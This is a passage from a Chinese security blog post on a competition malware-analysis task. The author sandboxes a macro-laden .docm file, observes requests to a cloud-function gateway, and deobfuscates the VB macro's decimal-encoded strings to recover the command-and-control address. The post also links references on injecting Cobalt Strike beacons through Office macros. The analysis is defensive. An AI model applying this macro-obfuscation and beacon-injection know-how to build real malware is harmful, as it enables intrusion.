<p>重新应用Win7x32bit沙箱，发现了向云函数网关的HTTP请求：</p>
<p><img src="http://cdn.polowong.top/image-20240401191612479.png" alt="image-20240401191612479"></p>
<h3 id="VB解混淆部分"><a href="#VB解混淆部分" class="headerlink" title="VB解混淆部分"></a>VB解混淆部分</h3><p>对于XX.docm中的VB代码进行解混淆，十进制先转十六进制，或者十进制直接转ascii都OK，可以直接看到云函数地址</p>
<p><img src="http://cdn.polowong.top/image-20240401193337435.png" alt="image-20240401193337435"></p>
<p><img src="http://cdn.polowong.top/image-20240401193346949.png" alt="image-20240401193346949"></p>
<p>获得云函数地址后结合威胁情报就可以继续分析了。</p>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p><a target="_blank" rel="noopener" href="https://gist.github.com/magnusstubman/18397dfd4fc6d22892cd4ee183747ef7">https://gist.github.com/magnusstubman/18397dfd4fc6d22892cd4ee183747ef7</a></p>
<p><a target="_blank" rel="noopener" href="https://kpmg.com/nl/en/home/insights/2022/05/injecting-a-cobalt-strike-beacon-from-an-office-macro-under-windows-defender.html">https://kpmg.com/nl/en/home/insights/2022/05/injecting-a-cobalt-strike-beacon-from-an-office-macro-under-windows-defender.html</a></p>

      
    </div>
    <div class="article-footer">
      <blockquote class="mt-2x">
  <ul class="post-copyright list-unstyled">
    
    <li class="post-copyright-link hidden-xs">
      <strong>Article Link</strong>
      <p style="width: 100%;
  word-wrap: break-word;
  word-break: break-all;
  overflow: hidden;">https://polosec.github.io/2024/05/05/OSCTI%E5%9C%A8%E6%AF%94%E8%B5%9B%E4%B8%AD%E7%9A%84%E5%BA%94%E7%94%A8/</p>
    </li>
    
    <li class="post-copyright-license">
      <strong>Copyright Notice: </strong> All articles in this blog, unless otherwise stated, are under the<a href="http://creativecommons.org/licenses/by/4.0/deed.zh" target="_blank" rel="external"> CC BY 4.0 CN agreement</a>.Reprint please indicate the source!
    </li>
  </ul>
</blockquote>


<div class="panel panel-default panel-badger">
  <div class="panel-body">
    <figure class="media">
      <div class="media-left">
        <a href="https://github.com/polosec" target="_blank" class="img-burn thumb-sm visible-lg">
          <img src="http://cdn.polowong.top/1.jpg" class="img-rounded w-full" alt="">
        </a>
      </div>
      <div class="media-body">
        <h3 class="media-heading"><a href="https://github.com/polosec" target="_blank"><span class="text-dark">Polo</span><small class="ml-1x">CTFer&amp;Cybersec Researcher</small></a></h3>
        <div>Wong</div>
      </div>
    </figure>
  </div>
</div>


    </div>
  </article>
  
    
  <section id="comments">
  	
      <div id="uyan_frame"></div>
    
  </section>


  
</div>

  <nav class="bar bar-footer clearfix" data-stick-bottom>
  <div class="bar-inner">
  
  <ul class="pager pull-left">
    
    
    <li class="next">
      <a href="/2023/12/24/%E4%B8%AA/" title="跟WIZ学K8s安全与云安全--CTF挑战赛"><span>Older&nbsp;&nbsp;</span><i class="icon icon-angle-right" aria-hidden="true"></i></a>
    </li>
    
    
  </ul>
  
  
  <!-- Button trigger modal -->
  <button type="button" class="btn btn-fancy btn-donate pop-onhover bg-gradient-warning" data-toggle="modal" data-target="#donateModal"><span>$</span></button>
  <!-- <div class="wave-icon wave-icon-danger btn-donate" data-toggle="modal" data-target="#donateModal">
    <div class="wave-circle"><span class="icon"><i class="icon icon-bill"></i></span></div>
  </div> -->
  
  
  <div class="bar-right">
    
    <div class="share-component" data-sites="weibo,qq,wechat,facebook,twitter" data-mobile-sites="weibo,qq,qzone"></div>
    
  </div>
  </div>
</nav>
  
<!-- Modal -->
<div class="modal modal-center modal-small modal-xs-full fade" id="donateModal" tabindex="-1" role="dialog">
  <div class="modal-dialog" role="document">
    <div class="modal-content donate">
      <button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
      <div class="modal-body">
        <div class="donate-box">
          <div class="donate-head">
            <p>Maybe you could buy me a cup of coffee.</p>
          </div>
          <div class="tab-content">
            <div role="tabpanel" class="tab-pane fade active in" id="alipay">
              <div class="donate-payimg">
                <img src="/images/donate/vx.png" alt="Scan Qrcode" title="Scan" />
              </div>
              <p class="text-muted mv">Scan this qrcode</p>
              <p class="text-grey">Open alipay app scan this qrcode, buy me a coffee!</p>
            </div>
            <div role="tabpanel" class="tab-pane fade" id="wechatpay">
              <div class="donate-payimg">
                <img src="/images/donate/vx.png" alt="Scan Qrcode" title="Scan" />
              </div>
              <p class="text-muted mv">Scan this qrcode</p>
              <p class="text-grey">Open wechat app scan this qrcode, buy me a coffee!</p>
            </div>
          </div>
          <div class="donate-footer">
            <ul class="nav nav-tabs nav-justified" role="tablist">
              <li role="presentation" class="active">
                <a href="#alipay" id="alipay-tab" role="tab" data-toggle="tab" aria-controls="alipay" aria-expanded="true"><i class="icon icon-alipay"></i> alipay</a>
              </li>
              <li role="presentation" class="">
                <a href="#wechatpay" role="tab" id="wechatpay-tab" data-toggle="tab" aria-controls="wechatpay" aria-expanded="false"><i class="icon icon-wepay"></i> wechat payment</a>
              </li>
            </ul>
          </div>
        </div>
      </div>
    </div>
  </div>
</div>



</main>

  <footer class="footer" itemscope itemtype="http://schema.org/WPFooter">
	
	
    <ul class="social-links">
    	
        <li><a href="https://github.com/polosec" target="_blank" title="Github" data-toggle=tooltip data-placement=top><i class="icon icon-github"></i></a></li>
        
    </ul>

    <div class="copyright">
    	
        <div class="publishby">
        	Theme by <a href="https://github.com/polosec" target="_blank"> polosec </a>base on <a href="https://github.com/polosec/hexo-theme-pure" target="_blank">pure</a>.
        </div>
    </div>
</footer>
  <script src="//cdn.jsdelivr.net/npm/jquery@1.12.4/dist/jquery.min.js"></script>
<script>
window.jQuery || document.write('<script src="js/jquery.min.js"><\/script>')
</script>

<script src="/js/plugin.min.js"></script>


<script src="/js/application.js"></script>


    <script>
(function (window) {
    var INSIGHT_CONFIG = {
        TRANSLATION: {
            POSTS: 'Posts',
            PAGES: 'Pages',
            CATEGORIES: 'Categories',
            TAGS: 'Tags',
            UNTITLED: '(Untitled)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '/content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>

<script src="/js/insight.js"></script>






   
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





   
    
    <script defer type="text/javascript" src="http://v2.uyan.cc/code/uyan.js?uid=[object Object]"></script>




  <script src="//cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.3.5/dist/jquery.fancybox.min.js"></script>
  <script>
  //利用 FancyBox 实现点击图片放大
  $(document).ready(function() {
    $('article img').not('[hidden]').not('.panel-body img').each(function() {
      var $image = $(this);
      var imageCaption = $image.attr('alt');
      var $imageWrapLink = $image.parent('a');
      if ($imageWrapLink.length < 1) {
        var src = this.getAttribute('src');
        var idx = src.lastIndexOf('?');
        if (idx != -1) {
          src = src.substring(0, idx);
        }
        $imageWrapLink = $image.wrap('<a href="' + src + '"></a>').parent('a');
      }
      $imageWrapLink.attr('data-fancybox', 'images');
      if (imageCaption) {
        $imageWrapLink.attr('data-caption', imageCaption);
      }
    });
    $().fancybox({
      selector: '[data-fancybox="images"]',
      hash: false,
      loop: false,
    });
  });
  </script>





</body>
</html>